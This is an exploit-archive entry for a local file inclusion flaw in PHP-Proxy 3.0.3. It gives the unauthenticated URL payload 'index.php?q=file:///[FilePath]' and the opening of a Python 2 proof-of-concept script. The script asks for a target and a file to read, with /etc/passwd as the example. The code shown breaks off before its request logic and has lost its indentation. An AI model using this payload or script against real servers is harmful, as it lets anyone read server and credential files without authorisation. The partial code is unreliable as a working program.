Php proxy 3.0.3 local file inclusion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-11-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Php proxy 3.0.3 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion
# Date: 04.11.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact:
# Vendor Homepage:
# Software Link:
# Version: v3.0.3
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?q=file:///[FilePath]
# PoC
import urllib2, httplib, sys
print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS"
print "[*] My Blog -\n"
print "[+] usage: python " + __file__ + " http://<target_ip/domain>"
if (len(sys.argv) != 2):
print "[*] Usage: <target_ip/domain>"
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')